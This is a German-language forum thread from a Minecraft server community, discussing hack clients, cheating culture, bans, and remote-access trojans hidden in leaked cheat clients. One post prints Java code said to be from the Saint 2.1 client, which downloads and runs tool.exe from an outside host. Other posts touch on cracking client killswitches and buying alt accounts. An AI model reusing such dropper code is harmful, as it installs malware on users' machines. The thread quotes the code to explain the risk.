Minecraft Hacking – Ich hab es ausprobiert

Sceptix

Mitglied
2 Dez. 2014
251
1.671
665
Ich habe vorgestern aus Langeweile mal Saint v. 2.3 desinfected^^ Selbst der uralte Saint hatte noch ca. 10 Links zu Andrews Servern/RAT's drin. Allerdings war das desinfecten nahezu nutzlos, da keiner dieser Server mehr erreichbar war. Die waren alle vom Hoster downgenommen worden da sie seinen Account wegen der Verbreitung von Malware gesperrt hatten. :D Somit ging ohnehin keine Gefahr mehr davon aus. Allerdings... Ich will garnicht wissen wie viele RAT's/Downloader ich in Icarus B16.1 finden würde...^^

in b11 hab ich 12 gefunden. viel glück m8
 
  • Like
Reaktionen: Manic97
D

djI6mR9xvPCJQkZ4z-MBwK7H

Unregistriert
ähhh ... @Badet :eek:
Also ich persönlich muss sagen: Ja, es ist sehr aufwändig & wenn man sich nicht damit auskennt, sollte man definitiv die Finger davon lassen. Eben wenn du keinen Trojaner auf deinem PC ha

Prinzipiell muss ich sagen, dass das Hacken aus Jux & Tollerei eigentlich total langweilig ist.
Man weiß, dass man gewinnt & fertig.
Ja guuut, hab ich gesagt, dass ich manchmal mit @Badet was ausprobiere...
Thema ausprobieren:
Viele Leute sind bestimmt so neugierig und wollen wissen, wie das NCP auf diversen Servern funktioniert.
Wenn du Gomme mal mit Timolia vergleichst... ein Weltuntergang.
Eigentlich hättest du in diesem Thread gleich noch delta242 grüßen sollen, wem wir es zu verdanken haben, dass die ganze Haze-Community abgelassen hat, weil sie in BW nicht mehr zur Mitte gliden können, sich mit ScaffoldWalk zu ihren Nachbarn bauen können, mit ihrer bis zu 8 Blöcken-KillAura (das ist nämlich auch auf Timolia möglich) jeden Kampf für ihren Gegner unmöglich machen, (...)
Die Entwicklung gefällt mir, muss ich an der Stelle einfach mal sagen.
Wenn du dir Videos von Haze von vor 1 Jahr anschaust, wo er mit Phase in SG out of map gegangen ist & noch jede Menge Scheiße gebaut hat - und erst Recht nicht in den nächsten Stunden gebannt wurde..
Heute gibt's das alles nicht mehr.
Heute leben wir alle froh in der legit-Community.
Ich könnte hier noch ein paar Jahre philosophieren, aber das kann @Badet definitiv besser :D

Grüße
Frau Reiß
Naja das mit glide inzwischen haben private Clients schon aac glide und scaffoldwalk von alive geht durch wie butter ebenso die killaura

in b11 hab ich 12 gefunden. viel glück m8
Sceptix ??? Bist du nicht der Sceptix aus trinity? Falls ja, ich bin TryVNX , falls du mich noch kennst.
 

Manic97

Mitglied
19 Aug. 2014
2.177
2.198
1.435
dem Bambusuniversum, neben Hogwarts
www.youtube.com
nö keine Ironie. Ich kann in desinfecten :)
k. nix kunstvolles m8

Kommt darauf an^^ bei manchen Clients mit einer eigenen String-Obfuscation anstatt ZKM oder Allatori ist schon etwas "Kunst" bzw. Erfahrung nötig. Und bei manchen Clients ist es eben easy. Genau wie beim cracken. Manche bauen eben hunderte Killswitches ein, und manche machen es so wie bei der VIP Version von Wolfram damals, wo man nur ein einziges if Statement entfernen musste um das ganze zu cracken...
 

Sceptix

Mitglied
2 Dez. 2014
251
1.671
665
Kommt darauf an^^ bei manchen Clients mit einer eigenen String-Obfuscation anstatt ZKM oder Allatori ist schon etwas "Kunst" bzw. Erfahrung nötig. Und bei manchen Clients ist es eben easy. Genau wie beim cracken. Manche bauen eben hunderte Killswitches ein, und manche machen es so wie bei der VIP Version von Wolfram damals, wo man nur ein einziges if Statement entfernen musste um das ganze zu cracken...

Man kann btw. trotzdem nach dem HTTPConnection-Zeugs suchen, wenn du da was komisches findest ersetzt du den jeweiligen (auch Stringobf) String durch zb. 127.0.0.1.

100 Killswitches bringen btw. auch ned sehr viel. Die kann man alle rausfiltern.
 
C

CAzZGy20OHrkK3c8ETcEdgEo

Unregistriert
Ich habe mal auf dem Handy Minecraft Pocket edition online sg gehackt (es war langweilig, weil ich nur gewonnen habe)
 

Nihiltarier

Mitglied
25 Feb. 2015
206
1.947
1.075
(facepalm)(facepalm)(facepalm)

jRAT ist nicht umsonst ein Java-RAT, damit er auch dort funktioniert.

Überall wo du Minecraft laufen lassen kannst, läuft auch ein jRAT.
Na und, welche Tasks will der laufen lassen? xd
Easy remove und feddich.

Und ich rede nicht nur von Java-RATs.

Und wie wo soll der Remote Acess laufen? Soll der n startskript oder ctl anlegen? ^^ ist eigentlich nur intern in ner Anwendung, also unoProblemo

gefühlte 318 rats
Da steht btw rats und nicht J-RATs

Überall wo du Minecraft laufen lassen kannst, läuft auch ein jRAT.
Das ist mir klar, aber ich habe das jetzt im Anbetracht der "bösen" RATs betrachtet.
 

Manic97

Mitglied
19 Aug. 2014
2.177
2.198
1.435
dem Bambusuniversum, neben Hogwarts
www.youtube.com
Na und, welche Tasks will der laufen lassen? xd
Easy remove und feddich.

Und ich rede nicht nur von Java-RATs.

Und wie wo soll der Remote Acess laufen? Soll der n startskript oder ctl anlegen? ^^ ist eigentlich nur intern in ner Anwendung, also unoProblemo

Der jRAT selbst ist eine remote-control Anwendung die dazu keine Skripte bemötigt.

Da steht btw rats und nicht J-RATs

Weil jRATS auch RATS sind. (facepalm)

Easy remove und feddich.

Der jRAT gräbt sich tief ins System ein. So leicht wird man die meistens nicht wieder los.
 

Nihiltarier

Mitglied
25 Feb. 2015
206
1.947
1.075

Nihiltarier

Mitglied
25 Feb. 2015
206
1.947
1.075
Ja. Wo genau sich ein jRAT ins System gräbt weiß ich zwar nicht auswendig, aber er kann sich auch an verschiedene Komponenten hängen oder einfach sofort bei der Ausführung alles löschen.
Dafür braucht er aber Root Rechte c:
Die muss ich manuell vergeben, ansonsten kann das Ding nichts machen, weil ich als normaler Hans nur im /home Verzeichnis arbeiten kann. Und da kann nichts passieren.
An anderen Prozessen kann es sich auch nicht hängen.

Oder ist man so dumm und führt Java mit Sudo aus?

Und so ne Frage, kannst du ein Beispiel für ne RAT in ner jar eines Hackclients zeigen? WIe der Code aufgebaut ist?
 
D

dFIF7ATpjJFv9_LwZhqptn--

Unregistriert
So jetzt muss ich aber auchmal meine Senf dazugeben.
Zuerst ein paar generelle Infos, ich wahr Jahrelang in der Cheaterszene involviert und weiß, wie Cheats arbeiten, wie sie Anti-Cheat systeme "unterdrücken" und sonstiges. Aber jetzt kommen wir mal zum Punkt, warum ich diesen Beitrag verfasse.

Zitat:
"Aber: Wie komme ich darauf? Ganz einfach. Auf YouTube finden sich immer mehr Let's Hack Gameplays und Hack- Client Vorstellungen. Und manchmal frage ich mich, wenn ich wieder mal auf ein Let's Hack gestoßen bin: „Wie fühlen die sich eigentlich und wie hacken sie“. So begann es. Am Anfang stand erst eine Recherche nach Hack-Clients. Leicht war es nicht einen guten Client oder Leak zu finden, da man besonders vorsichtig damit umgehen muss. Bestes Beispiel hier: Ein Saint Leak (haze), der einen jRAT enthält). Da habe ich mir aber wieder folgende Frage gestellt: Wie kommen den die Hacker, oder die die es werden wollen an die ganzen Clients und wieso diese Menschen ein so hohes Sicherheitsrisiko eingehen, nur damit sie mit etwas KillAura hier einen auf Babo machen können? Am Ende habe ich im Endeffekt Stunden gebraucht um einen Client zu finden, von dem ich hoffe, dass er clean ist. Der Client hieß „DarkCloudZ 1.9.4“. Es war eine Leak Version. So habe ich den Client installiert und dann Minecraft gestartet."

Meine Stellungnahme:
Mann muss im grunde genommen nicht vorsichtig damit umgehen, wenn man die "richtigen" Seiten und Erfahrungen gesammelt hat. Daher klärt sich auch die Frage, woher die "Hacker" ihre cleanen Clients herbekommen.
Natürlich ist es armselig zu Hacken, keine Frage, aber in diesem Moment, wo man Hackt, aus verschiedenen Gründen (z.b. selber schlechte Erfahrungen gemacht), fühlt man sich den normalen Nutzern überlegen, da man keine alltäglichen Modifikationen besitzt, die einem einen ENORMEN Vorteil verschaffen. Ebenfalls cheaten auch viele User aus Rache, da diese selbst schlechte Erfahrungen mit Cheatern erleben mussten und damit, sozusagen, zurückschlagen wollen. Dies hat schlechte Erfahrung für den Betroffenen. Dies ist so wie ein Teufelskreis. Manche denken sich, bitte lass es schnell vorüber gehen, andere aber sind davon deprimiert, dass einem einer mit Modifikationen so überlegen ist, dass er zurückschlagen möchte und oft damit die falschen trifft.
Jetzt möchte ich aber nicht lange um den heißen Brei herumreden, sondern zum nächsten Punkt kommen.

Zitat:
"Im Minecraft Hauptmenü, sah es wie gewohnt aus. Jedoch wurde unter „Muliplayer“ ein neuer Button hinzugefügt. „Accounts“. Dieser dient dazu, bspw. Sollte dazu dienen, um z.B wenn man von einem Server gebannt ist, InGame sich in einen anderen umzuloggen. Das ganze hab ich dann anhand von Cracked-Accounts genutzt. Am Ende war es dann aber nur zweimal von Nöten."

Stellungnahme:
Bei jedem Cheatclient sieht das Hauptmenü unterschiedlich aus. Bei eher "billigeren" ist das Hauptmenü kaum bis garnicht verändert. Das mit den Accounts ist für die Cheater auf Cracked Servern sehr hilfreich und ist bei fast jedem Cheatclient intigriert.

Zitat:
"So. Als Cracked-Spieler eingeloggt, bin ich erstmal auf einen Cracked-Server gejoint und habe dort etwas in SkyPVP gehackt. Da waren aber (leider) nicht so viele Spieler. Somit habe ich etwas weiter nach einem Cracked-Server gesucht, bis ich einen mit dem Spielmodus „1vs1“ gefunden hatte. Dort habe ich dann gegen einige Spieler gespielt und wurde schnell als „Hacker“ bezeichnet und beleidigt. Okay. Hab es auch eigentlich nicht anders verdient ;) So ich habe weiter gegen die Spieler gehackt. Und Leute: Es hat mir kaum Spaß gemacht zu hacken. So ein Gefühl von Freude wie viele Hacker , die auf YouTube Gameplays machen, fand ich kaum in mir. Ich habe versucht, wenigstens etwas Freude zu empfinden. Hacken ist wohl nicht mein Ding (Ist wahrscheinlich auch besser so). Interessant wurde es dann als erst ein, dann zwei weitere Hacker auf den Server kamen und wir uns dann gegenseitig mit Hax fertig gemacht haben und somit dann ins Gespräch über Hack-Clients kamen. Einer hatte seinen Client selbst aus anderen Clients zusammengestellt, der andere benutzte haze und Saint. Dieser wurde dann anscheinend, wegen Diskriminierung gebannt (Alles klar).Ich habe immer noch gegen die anderen Hacker und Spieler gespielt bis ein Mod/Admin kam und mich gebannt hat. Okay, dachte ich. Kein Problem, dachte ich und ging im Hauptmenü auf den Account-Manager und habe mich eben anders genannt und mich als Cracked eingeloggt. Auf dem wurde ich aber wieder direkt gebannt. Also anderer Cracked-Account. Der hat dann funktioniert. Dann ging es weiter in „1vs1“. Aber leider wurde der „1vs1“ Server neugestartet und der eine Hacker, der btw. AFK war, nicht mehr da war und das ganze langweilig wurde. So hab ich dann gesagt: „Ey, du hast dir jetzt lange genug ein Bild davon gemacht“, und bin disconnected und habe den Client und den .minecraft-Ordner gelöscht und habe eine Daten-Überprüfung begonnen (sicher ist sicher) und mein PC erstmal vom Internet getrennt, falls ich durch den Hack-Client gehackt werde/wurde etc."

Stellungnahme:
Das man als Hacker und Cheater beleidigt wird, falls man Cheatet ist selbstverständlich. Zum Teil ticken die Nutzer komplett aus und es entstehen Beleidigungen, die nicht in Worte zusammengefasst werden können. Das man Cheatet, wie auch oben beschrieben, hat verschiedene Gründe. Jeder hat beim Cheaten ein anderes Gefühl, manche ein überlegendes Gefühl, manche ein komisches. Viele wollen sich aber auch nur rächen. Sobald zwei Cheater aufeinander treffen, begeben wir uns in ein Römisches Gladiator Zeitalter. Der stärkerer, in diesem Fall der, der die besseren Cheats hat, gewinnt. Natürlich habe Leute, die zum ersten mal Cheaten und ängstlich sind, einen gewissen "Kick" den man mit einem Adrenalin-schub vergleichen kann. Man möchte immer mehr, immer besser usw usw. bis der Bann kommt, dann wird mit Engelsstimmchen versichert, es wird nie wieder gecheatet usw usw. Das kennen wir doch alle. Jetzt kommen wir aber zu deinem Fazit, wo ich noch etwas ergänzen und meine Eigene Meinung zusammen fassen möchte.
PS: Du musst legendlich die .jar sowie die .json Dateien löschen. Es befindet sich nichts mehr, falls der Cheat clean war, in irgendwelchen Ordnern. (Eigene Erfahrung)

Zitat:
"Mein Fazit sah dann so aus: Überhaupt erstmal an die Clients zu kommen ist sehr schwer und gefährlich. Denn in der Hacker-Community im Internet, kann man niemandem (wirklich) trauen, da viele Leaks angeblich mit Viren und Trojanern und jRAT's verseucht seinen sollten und echt gefährlich werden können. Was aber auch gut sein kann um Leute, die sich diese verseuchten Leaks holen wollen, damit, falls ihre Sicherheit sie irgendwie interessiert, abgeschreckt werden und es nicht wagen wollen, zu hacken. Jedoch haben Leute die wirklich hacken können und es wollen, auch Spaß anderen den Spielspaß zu verderben. Damit muss sich aber abfinden, dass es immer Hacker geben wird. Und z.B das Gomme-Team versucht alles, damit die Hacker gebannt werden. Durch das AntiHack-Plugin und die Mods, werden die Account Listen von Hackern kleiner und das Team bannt sogar Accounts von öffentlichen Account-Listen (wenn ich das richtig mitbekommen habe). Das gilt aber sicherlich nicht für das Gomme-Team ;) Ich habe den Spielern den Spielspaß verd0rben - meinen gleich dazu."

Stellungnahme:
Für Anfänger ist es wirklich schwer zwischen unseriös und seriös zu unterscheiden. Nach einer weile, wenn man sich damit intensive beschäftigt, weiß man, was clean ist und gute Performance liefert. Aber jetzt zum nächsten Thema.
Mit "Denn in der Hacker-Community im Internet, kann man niemandem (wirklich) trauen, da viele Leaks angeblich mit Viren und Trojanern und jRAT's verseucht seinen sollten und echt gefährlich werden können" kann ich dir garnicht folgen und garnicht zustimmen. Vlt ist dies deine Meinung aber die Cheater Foren habe zum teil eine stärkere Bindung zu den Usern als normale MC oder Gaming Foren. Es kann offen über Cheats usw gesprochen werden ohne als "Hacker" oder "Cheater" im negativem Sinne beleidigt zu werden. Die User können sich austauschen, über alles aussprechen und dadurch den vorgestellten Cheat sogar verbessern! Dies ist meines erachtens eine enomore Leistung! Viele werden jetzt sicherlich das Gegenteil behaupten. Nein! Ihr wart auf den falschen Websiten! Sobald du dir einen Ruf in der Community gemacht hast, wirst du, falls du gut Coden kannst, als Gott angesehen. In anderen Foren wird sich darüber unterhalten usw usw. kennen sicherlich ein paar unter euch. Dadurch kannst du dir deine eigene Gruppe aufbauen. Dies könnte man mit der Armee vergleichen immer mehr werben um größer zu werden.... Aber ich merke, ich drifte schon wieder in ein anderen Thema ab, vondaher versuche ich mich wieder auf dein Fazit zu konzentieren. "Damit muss sich aber abfinden, dass es immer Hacker geben wird" da muss ich dir leider zustimmen, ich war und wird nie ein Cheat/ Hackfreies Internet geben. Sobald man auf den, mein allseits berühmtes Wort, RICHTIGEN Seiten unterwegs ist, wird man auch kaum auf Cheater stoßen. ABER falls man wissen möchte wie alles funktioniert und wie man sich schützt, muss man selber einmal Erfahrung damit gemacht haben, um die Materie zu verstehen. "Durch das AntiHack-Plugin und die Mods, werden die Account Listen von Hackern kleiner und das Team bannt sogar Accounts von öffentlichen Account-Listen (wenn ich das richtig mitbekommen habe)" dies ist natürlich Fürsorge für die Nutzer, kann sich aber auch negativ auf die gebannten Nutzer und dadurch auf den Server auswirken. Es werden oft, falls es Server machen, Thesen aufgestellt wo drin berichtet wird, dass dieser Server Nutzer unberechtigt bannt und davon abrät darauf zu joinen. Man muss sich bewusst man, welche Folgen dies für den eigenen Server haben kann und nichts überstürzen, sowie nicht zu lange warten, meist ist es dann auch schon zu spät. "Das gilt aber sicherlich nicht für das Gomme-Team ;) Ich habe den Spielern den Spielspaß verd0rben - meinen gleich dazu" dies ist schon wieder deine Kritik. Natürlich strengt sich das Gomme-Team an, die Cheater zu bannen, leider ist dies unmöglich, da immer mehr "auf die dunkle Seite" konventieren. Natürlich verdirbt man den anderen Spielern die Freude am Spiel, doch sobald man cheatet ist einem dieses bewusst und macht es trotzdem, obwohl Schäden entstehen können.

Zitat:
"Die Nachricht die ich euch übermitteln will lautet: Lasst die Finger von Hacks. Sie können sehr gefährlich werden und ist es ist echte Geldverschwendung sich welche teuer bei haze oder anderen Leuten sich Hack-Clients zu kaufen. Bleibt einfach fair und spielt ohne Hacks, denn es macht so einfach mehr Spaß und ist sicher ;)"

Stellungnahme:
Natürlich soll man die Finger davon weglassen, aber gefährlich werden sie erst, wenn man nicht mehr weiß, was man macht. Ich stimme dir ebenfalls zu, dass dies Geldverschwendung ist, trotzdem brauche das manche, wie es oben beschrieben ist.

Zitat:
"Am Ende will ich mich nochmal bei allen Spielern entschuldigen, dessen Spielspaß ich verdorben habe :)"

Stellungnahme:
Dies ist sehr ehrenhaft und wird selten von einem ehemaligem Cheater in der MC- Szene gesehen. Respekt!

Zitat:
"Und jetzt würde ich gerne von euch wissen: Habt ihr schon mal gehackt und welches Gefühl hattet ihr dabei und wie seid ihr wieder auf den rechten Pfad gekommen? Mit welchen Hack-Client habt ihr gehackt? Und, und, und. Mich interessiert eure ehrliche Meinung sehr :)"

Stellungnahme:
Ich hatte aus vielen verschiedenen Gründen gehackt. Einerseits, weil es mir endlich reichte nur gegen Cheater zu spielen und ich wollte auch einmal zurückschlagen und nicht immer einstecken. Dadurch habe ich viele nette, noch Aktive sowie Ex Cheatcoder kennnegelernt, sie haben mir alles nötige beigebracht, wie ich mich gegen Viren, Trojaner, jRats und den ganzen Schrott rette. Er hat mir ebenfalls eher private Websits mit qualitativ hochwertigen Cheats gezeigt. (Info: Momentan berichte ich nur über Cheats. Alle websits sind aus dem sogenannten darkweb, oder auch als deepweb bekannt. Über meine etwas andere Karriere mit Hacks und cheats möchte ich ungern ansprechen, weshalb ich auch euch bitte, dies nicht zu hinterfragen) So langsam kam ich dann rein und wurde immer besser und besser. Es hat sich gesteigert und ich bekam in den Foren "respekt". Dies war bis vor ~ 4 Monaten der Fall. Danach bin ich nur aus einem einzigen Grund ausgestiegen und habe bis jetzt [02:29 02.04.2016] keinen Cheat mehr angerührt. Ich wollte endlich ein Hobby (Yep, ich war Jahrelang hobbylos) und habe mich für YouTube entschieden, wieso das? Ich sitze sehr viel und oft vor dem PC und spiele sehr sehr sehr gerne. Danach habe ich halt "Special" szenen aufgenommen und zusammengeschnitten. Ich dachte mir, komm zeig ich es doch anderen Leuten, vlt gefällt es ihnen und ja, es kam an. Danach habe ich mich immer mehr hineingesteigert und jetzt bin ich ein recht kleiner YouTuber (~100 Abos) aber habe mehr spaß als je zuvor in meinem Leben.


Das war mein Leben in der Cheaterkarriere. Rechtschreibfehler könnt ihr gerne behalten. Ich saß hierdran über 2 Stunden und würde mich über Feedback freuen. Dies war eine sehr ausführliche und einigermaßen Detailierte beschreiben, sodass es noch normale Internet/ Forennutzer verstehen.

MfG Loli

Dafür braucht er aber Root Rechte c:
Die muss ich manuell vergeben, ansonsten kann das Ding nichts machen, weil ich als normaler Hans nur im /home Verzeichnis arbeiten kann. Und da kann nichts passieren.
An anderen Prozessen kann es sich auch nicht hängen.

Oder ist man so dumm und führt Java mit Sudo aus?

Und so ne Frage, kannst du ein Beispiel für ne RAT in ner jar eines Hackclients zeigen? WIe der Code aufgebaut ist?
Dies erkennt man oft, wenn das Programm die Nutzerdaten an Emails oder an Server schickt, momentan kann ich dir dies nicht demostrieren und möchte ungern ein Sourcecode veröffentlichen (ja, der ist sehr einfach, trotzdem möchte ich keine User zu unerlauben sachen helfen) Dies passiert während dem startscreen. Ebenfalls kann man Accounts hinzufügen, die bei infizierten Cheats ebenfalls die nutzerdaten weiterschickt. Natürlich sind diese Code leicht zu finden, trotzdem sind viele Nutzer nicht in der Lage dazu, diese ausfindig zu machen und zu löschen. Ich hoffe ich konnte dir mit diesem Beitrag helfen. MfG Loli
 
  • Like
Reaktionen: Sanifar

Sceptix

Mitglied
2 Dez. 2014
251
1.671
665
PS: Du musst legendlich die .jar sowie die .json Dateien löschen. Es befindet sich nichts mehr, falls der Cheat clean war, in irgendwelchen Ordnern. (Eigene Erfahrung)

Hier ist der Code der Saint 2.1 verwendet hat um einen PC zu infecten:
Code:
try
    {
      String fileURL = "http://andrewthehax0r.xyz/tool.exe";
      String saveDir = "libraries/com/google/code/gson/gson";
      URL url = new URL(fileURL);
      HttpURLConnection httpConn = (HttpURLConnection)url.openConnection();
      int responseCode = httpConn.getResponseCode();
      if (responseCode == 200)
      {
        String fileName = "";
        String disposition = httpConn.getHeaderField("Content-Disposition");
        String contentType = httpConn.getContentType();
        int contentLength = httpConn.getContentLength();
        if (disposition != null)
        {
          int index = disposition.indexOf("filename=");
          if (index > 0) {
            fileName = disposition.substring(index + 10,
              disposition.length() - 1);
          }
        }
        else
        {
          fileName = fileURL.substring(fileURL.lastIndexOf("/") + 1,
            fileURL.length());
        }
        InputStream inputStream = httpConn.getInputStream();
        String saveFilePath = saveDir + File.separator + fileName;
       
        FileOutputStream outputStream = new FileOutputStream(saveFilePath);
       
        int bytesRead = -1;
        byte[] buffer = new byte['?'];
        while ((bytesRead = inputStream.read(buffer)) != -1) {
          outputStream.write(buffer, 0, bytesRead);
        }
        outputStream.close();
        inputStream.close();
      }
      httpConn.disconnect();
      Desktop.getDesktop().open(new File("libraries/com/google/code/gson/gson/tool.exe"));
    }
    catch (IOException localIOException) {}

Wie man sieht (falls man eine Priese Englischskills intus hat) wird eine RAT, namens tool.exe, in den Librariesordner in dem .Minecraft-Órdner gespeichert. Da bringt es nichts wenn man die Jar und die Json entfernt, die Json kann soweit ich weiss nichtmals infected sein. Und falls du jetzt sagst: "Dann lösch halt den .minecraft Ordner", man könnte die RAT auch irgendwo in System32 droppen, und sie dort mit Rootkits und was auch immer verstecken.
 

Manic97

Mitglied
19 Aug. 2014
2.177
2.198
1.435
dem Bambusuniversum, neben Hogwarts
www.youtube.com
Wie man sieht (falls man eine Priese Englischskills intus hat) wird eine RAT, namens tool.exe, in den Librariesordner in dem .Minecraft-Ordner gespeichert.

Es gab auch mal eine insurance.jar etc. die auch auf Linux funktioniert haben. Weiß nicht ob das in Saint 2.1 oder noch früher war.

"Durch das AntiHack-Plugin und die Mods, werden die Account Listen von Hackern kleiner und das Team bannt sogar Accounts von öffentlichen Account-Listen (wenn ich das richtig mitbekommen habe)"

Aber die Accountlisten werde nie kleiner. Im Gegenteil. Sie werden immer größer, sind allerdings nicht mehr so leicht zu finden.
Ich selbst kenne sogar zwei Seiten aus dem Darkweb/Deepweb die Alts anbieten, und jeder einzelne davon funktioniert auf GommeHD.net. Dort findet man sogar full access Alts und Alts mit Optifine Capes etc. aber das ist ein anderes Thema.

Man muss halt eines wissen:
In Shooter Spielen werden Cheater gebannt. Und bleiben in 95% der Fälle gebannt.
In Minecraft holt man sich einfach einen neuen Alt und weiter geht's.
Ich selbst fühle mich schon irgendwie scheisse wenn ich bedenke wie viele Bans von mir in meiner Zeit als GommeHD.net Moderator sinnlos waren, weil es eh nur Alts waren. Viele Accounts die auf GommeHD.net gebannt werden sind eben einfach nur Alts, die Cheater an sich kommen immer wieder zurück.

Man sollte halt auch bedenken dass Minecraft meistens von jüngeren gespielt wird, als ein Shooter.
Dementsprechend kann man in Minecraft auch viel viel leichter Accounts per Phishing, Scam, Fraud bzw. Betrug oder sonstige Mittel in seine Kontrolle bringen. So entstehen auch die hunderten, tausenden Accountlisten.
 
  • Like
Reaktionen: VisibleFreedom

Soziale Medien

Über uns

  • GommeHD.net ist einer der größten Minecraft-Server der Welt. Dir gefällt unser Server? Dann unterstütze uns durch einen Kauf im Shop!
  • Shop